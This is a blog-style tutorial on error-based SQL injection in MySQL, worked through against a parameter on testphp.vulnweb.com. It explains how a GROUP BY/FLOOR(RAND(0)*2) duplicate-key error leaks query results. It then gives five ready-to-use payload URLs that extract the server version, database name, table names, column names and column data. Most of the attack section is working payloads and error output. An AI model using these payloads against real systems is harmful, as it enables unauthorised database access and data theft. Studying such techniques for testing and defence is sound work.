i Error based SQL injection attack – All things in moderation

Error based SQL injection attack

Introduction

An Error based technique is useful when the tester can’t exploit the SQL injection vulnerability using other technique suchUNION. The Error based technique consists in forcing the database to perform some operation in which the result will be an error. Then try to extract some data from the database and show it in the error message.

Example we have an url maybe injectabe at parameter ‘cat’: http://testphp.vulnweb.com/listproducts.php?cat=1

Dectect and exploit SQL injection with error based technique

Dectect error based SQL injection

Lets adding a single quote (‘),a double qoute (“), a semicolon (;), comment delimiters (– or /* */, etc) and other SQL keywords like ‘AND’ and ‘OR’ to the field or parameter under test.
In this example i have test with a single qoute (‘)
http://testphp.vulnweb.com/listproducts.php?cat=1′
and server response with error in SQL syntax:

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74 

Then the website have Error based SQL injection!

Exploit

Consider the SQL query following:

SELECT * FROM users WHERE id=1;

If replace id = 1 AND (SELECT 1 FROM (SELECT count(*),CONCAT((SELECT @@version),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y)

Consider query:

SELECT COUNT(*), CONCAT((SELECT @@version),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x

This query use GROUP BY statement to group the result-set by one column x (I have select column x with statement CONCAT((SELECT @@version),0x3a,FLOOR(RAND(0)*2)) x)

  • GROUP BY: The GROUP BY statement is used in conjunction with the aggregate functions to group the result-set by one or more columns.
  • FLOOR(X): Returns the largest integer value not greater than X.
  • FLOOR(RAND(0)*2): Return result in two different numbers (0, 1)

A query above result with an error:

Error: Duplicate entry '5.1.73-0ubuntu0.10.04.1:1' for key 'group_key' 

– This error occur because GROUP BY is that it requires unique group keys. Since COUNT(*) will return the same value each time, concatenating that and the output of FLOOR(RAND(0)*2) three times will result in two different numbers (0, 1) then a second instance of 1, which causes an error (duplicate entry for group key), and displayed back to the user.

The query will be:

SELECT * FROM users WHERE id=1  AND (SELECT 1 FROM (SELECT count(*),CONCAT((SELECT @@version),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y);

Then I get DBMS version : ‘5.1.73-0ubuntu0.10.04.1

Now lets inject this payload for get database informations on the wesite.

AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((<Your Query here to return single row >),0x3a, FLOOR(RAND (0) *2)) x FROM information_schema.tables GROUP BY x) y);

1, Getting database version

payload:

http://testphp.vulnweb.com/listproducts.php?cat=-1 AND (SELECT 1 FROM (SELECT count(*),CONCAT((SELECT @@version),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y);--+

sample output:

2, Getting database

payload:

http://testphp.vulnweb.com/listproducts.php?cat=-1 AND (SELECT 1 FROM (SELECT count(*),CONCAT((SELECT database()),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y);--+

sample output:

3, Getting tables

payload:

http://testphp.vulnweb.com/listproducts.php?cat=-1 AND (SELECT 1 FROM (SELECT count(*),CONCAT((SELECT table_name from information_schema.tables where table_schema='acuart' limit 0,1),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y);--+

sample output:

4, Getting columns

payload:

http://testphp.vulnweb.com/listproducts.php?cat=-1 AND (SELECT 1 FROM (SELECT count(*),CONCAT((SELECT column_name from information_schema.columns where table_name='artists' limit 1,1),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y);--+

sample output:

5, Dump column data

payload:

http://testphp.vulnweb.com/listproducts.php?cat=-1 AND (SELECT 1 FROM (SELECT count(*),CONCAT((SELECT aname from artists  limit 1,1),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y);--+

sample output:

Following steps above, we are done get all database’s data use Error based SQL injection!

Leave a Reply